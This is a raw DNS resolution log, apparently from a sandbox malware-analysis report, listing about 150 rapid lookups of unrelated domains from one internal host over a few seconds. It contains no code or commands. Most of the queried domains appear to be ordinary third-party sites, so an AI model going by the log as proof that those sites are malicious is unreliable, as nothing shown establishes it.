                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.915591002 CET8.8.8.8192.168.2.50x454eName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.941498041 CET8.8.8.8192.168.2.50xaefcName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.978204012 CET8.8.8.8192.168.2.50x58a4No error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.115958929 CET8.8.8.8192.168.2.50x6b7aName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.214055061 CET8.8.8.8192.168.2.50x25cNo error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.297106981 CET8.8.8.8192.168.2.50x14f4Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.329252958 CET8.8.8.8192.168.2.50x53a0No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.348181963 CET8.8.8.8192.168.2.50xf762Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.377732992 CET8.8.8.8192.168.2.50x3a5dName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.470921040 CET8.8.8.8192.168.2.50x3b8eNo error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.591998100 CET8.8.8.8192.168.2.50xed06No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.591998100 CET8.8.8.8192.168.2.50xed06No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.644320011 CET8.8.8.8192.168.2.50x8eacNo error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.647347927 CET8.8.8.8192.168.2.50x8f08No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.748600006 CET8.8.8.8192.168.2.50x3326No error (0)araax.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.748600006 CET8.8.8.8192.168.2.50x3326No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.748600006 CET8.8.8.8192.168.2.50x3326No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.748600006 CET8.8.8.8192.168.2.50x3326No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.754751921 CET8.8.8.8192.168.2.50x80fName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.786778927 CET8.8.8.8192.168.2.50xd5deNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.786778927 CET8.8.8.8192.168.2.50xd5deNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.786778927 CET8.8.8.8192.168.2.50xd5deNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.786778927 CET8.8.8.8192.168.2.50xd5deNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.900424004 CET8.8.8.8192.168.2.50x54baNo error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.927234888 CET8.8.8.8192.168.2.50x9f72No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.172626972 CET8.8.8.8192.168.2.50xbfd2No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.230086088 CET8.8.8.8192.168.2.50x2943No error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.508451939 CET8.8.8.8192.168.2.50x3556No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.508451939 CET8.8.8.8192.168.2.50x3556No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.508451939 CET8.8.8.8192.168.2.50x3556No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.542028904 CET8.8.8.8192.168.2.50x4811No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.542028904 CET8.8.8.8192.168.2.50x4811No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.542028904 CET8.8.8.8192.168.2.50x4811No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.542028904 CET8.8.8.8192.168.2.50x4811No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.653201103 CET8.8.8.8192.168.2.50x7993No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.712449074 CET8.8.8.8192.168.2.50x4855No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.801595926 CET8.8.8.8192.168.2.50xfc1fNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.927490950 CET8.8.8.8192.168.2.50x7362No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.928132057 CET8.8.8.8192.168.2.50x92dcServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.940859079 CET8.8.8.8192.168.2.50xccabNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.010168076 CET8.8.8.8192.168.2.50xc43No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.038156033 CET8.8.8.8192.168.2.50x52ffNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.038156033 CET8.8.8.8192.168.2.50x52ffNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.038156033 CET8.8.8.8192.168.2.50x52ffNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.038156033 CET8.8.8.8192.168.2.50x52ffNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.052297115 CET8.8.8.8192.168.2.50xb37fNo error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.192984104 CET8.8.8.8192.168.2.50x566No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.192984104 CET8.8.8.8192.168.2.50x566No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.301522017 CET8.8.8.8192.168.2.50x48cfName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.680064917 CET8.8.8.8192.168.2.50x142cNo error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.744163036 CET8.8.8.8192.168.2.50xce8cNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.744163036 CET8.8.8.8192.168.2.50xce8cNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.766222000 CET8.8.8.8192.168.2.50xb9b4No error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.780366898 CET8.8.8.8192.168.2.50xa2b2No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.037472010 CET8.8.8.8192.168.2.50x839No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.151295900 CET8.8.8.8192.168.2.50xeec6No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.223421097 CET8.8.8.8192.168.2.50xaa5dNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.241883993 CET8.8.8.8192.168.2.50xcbe8No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.274121046 CET8.8.8.8192.168.2.50x870fNo error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.274121046 CET8.8.8.8192.168.2.50x870fNo error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.403832912 CET8.8.8.8192.168.2.50x5de2No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.732194901 CET8.8.8.8192.168.2.50xc775No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.894953012 CET8.8.8.8192.168.2.50x7b8aNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.894953012 CET8.8.8.8192.168.2.50x7b8aNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.894953012 CET8.8.8.8192.168.2.50x7b8aNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.236.92.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.894953012 CET8.8.8.8192.168.2.50x7b8aNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.237.200.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.319777966 CET8.8.8.8192.168.2.50x277bNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.350104094 CET8.8.8.8192.168.2.50xd2b5No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.383771896 CET8.8.8.8192.168.2.50x12adNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.383771896 CET8.8.8.8192.168.2.50x12adNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.383771896 CET8.8.8.8192.168.2.50x12adNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.383771896 CET8.8.8.8192.168.2.50x12adNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.477550983 CET8.8.8.8192.168.2.50x3d5No error (0)mail.protonmail.ch185.205.70.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.477550983 CET8.8.8.8192.168.2.50x3d5No error (0)mail.protonmail.ch185.70.42.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.477550983 CET8.8.8.8192.168.2.50x3d5No error (0)mail.protonmail.ch176.119.200.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.480870008 CET8.8.8.8192.168.2.50xf849No error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.480870008 CET8.8.8.8192.168.2.50xf849No error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.622859955 CET8.8.8.8192.168.2.50xa72bNo error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.721391916 CET8.8.8.8192.168.2.50x50f0No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.779896975 CET8.8.8.8192.168.2.50x94a3No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.779896975 CET8.8.8.8192.168.2.50x94a3No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.791851997 CET8.8.8.8192.168.2.50x5ac4No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.791851997 CET8.8.8.8192.168.2.50x5ac4No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:30.934541941 CET8.8.8.8192.168.2.50xf55fName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:30.988805056 CET8.8.8.8192.168.2.50x225bNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.044521093 CET8.8.8.8192.168.2.50x4083No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.089828014 CET8.8.8.8192.168.2.50x3f44No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.189779043 CET8.8.8.8192.168.2.50x9e40No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.201559067 CET8.8.8.8192.168.2.50x1a96No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.201559067 CET8.8.8.8192.168.2.50x1a96No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.249308109 CET8.8.8.8192.168.2.50x87f8No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.287642956 CET8.8.8.8192.168.2.50x6aedNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.304361105 CET8.8.8.8192.168.2.50x6db3No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.304361105 CET8.8.8.8192.168.2.50x6db3No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.306799889 CET8.8.8.8192.168.2.50x485fNo error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.310754061 CET8.8.8.8192.168.2.50x2292No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.310754061 CET8.8.8.8192.168.2.50x2292No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.318605900 CET8.8.8.8192.168.2.50x9aebNo error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.320821047 CET8.8.8.8192.168.2.50xf1abNo error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.320821047 CET8.8.8.8192.168.2.50xf1abNo error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.323698044 CET8.8.8.8192.168.2.50x8709No error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.330008030 CET8.8.8.8192.168.2.50x539No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.340009928 CET8.8.8.8192.168.2.50xae74No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.370712996 CET8.8.8.8192.168.2.50xc358No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.408901930 CET8.8.8.8192.168.2.50x5e43No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.408901930 CET8.8.8.8192.168.2.50x5e43No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.408901930 CET8.8.8.8192.168.2.50x5e43No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.408901930 CET8.8.8.8192.168.2.50x5e43No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.431586981 CET8.8.8.8192.168.2.50x276dName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.501948118 CET8.8.8.8192.168.2.50xd1f3No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.501948118 CET8.8.8.8192.168.2.50xd1f3No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.524199009 CET8.8.8.8192.168.2.50xb193No error (0)www.tc17.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.524199009 CET8.8.8.8192.168.2.50xb193No error (0)www.tc17.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.564188957 CET8.8.8.8192.168.2.50x79b9No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.572705030 CET8.8.8.8192.168.2.50xda69No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.572705030 CET8.8.8.8192.168.2.50xda69No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.587902069 CET8.8.8.8192.168.2.50xa110No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.618767977 CET8.8.8.8192.168.2.50x248No error (0)vivastay.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.618767977 CET8.8.8.8192.168.2.50x248No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.618767977 CET8.8.8.8192.168.2.50x248No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.618767977 CET8.8.8.8192.168.2.50x248No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.724571943 CET8.8.8.8192.168.2.50xdb21Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.857028008 CET8.8.8.8192.168.2.50x2500No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.857028008 CET8.8.8.8192.168.2.50x2500No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.857028008 CET8.8.8.8192.168.2.50x2500No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.857028008 CET8.8.8.8192.168.2.50x2500No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.865605116 CET8.8.8.8192.168.2.50x558fNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.865605116 CET8.8.8.8192.168.2.50x558fNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.928704023 CET8.8.8.8192.168.2.50xbceNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.928704023 CET8.8.8.8192.168.2.50xbceNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.994226933 CET8.8.8.8192.168.2.50xcbe9No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.084045887 CET8.8.8.8192.168.2.50xea8fNo error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.189685106 CET8.8.8.8192.168.2.50x5f18No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.225235939 CET8.8.8.8192.168.2.50x967fServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.231209040 CET8.8.8.8192.168.2.50x124cNo error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.231209040 CET8.8.8.8192.168.2.50x124cNo error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.234502077 CET8.8.8.8192.168.2.50x8e74No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.315880060 CET8.8.8.8192.168.2.50xe3d5No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.323043108 CET8.8.8.8192.168.2.50x1827No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.323043108 CET8.8.8.8192.168.2.50x1827No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.323043108 CET8.8.8.8192.168.2.50x1827No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.443494081 CET8.8.8.8192.168.2.50x43adNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.447710037 CET8.8.8.8192.168.2.50x3f22Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.497685909 CET8.8.8.8192.168.2.50x798fNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.669193029 CET8.8.8.8192.168.2.50x539No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.671412945 CET8.8.8.8192.168.2.50xdaccServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.693835020 CET8.8.8.8192.168.2.50xdb21Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.918154955 CET8.8.8.8192.168.2.50x967No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.055325031 CET8.8.8.8192.168.2.50xed51Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.188309908 CET8.8.8.8192.168.2.50x536eNo error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.188309908 CET8.8.8.8192.168.2.50x536eNo error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.228059053 CET8.8.8.8192.168.2.50xa5ffNo error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.228059053 CET8.8.8.8192.168.2.50xa5ffNo error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.228059053 CET8.8.8.8192.168.2.50xa5ffNo error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.228059053 CET8.8.8.8192.168.2.50xa5ffNo error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.269773006 CET8.8.8.8192.168.2.50xdce2Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.316212893 CET8.8.8.8192.168.2.50x7b7dServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.322362900 CET8.8.8.8192.168.2.50x3cd9No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
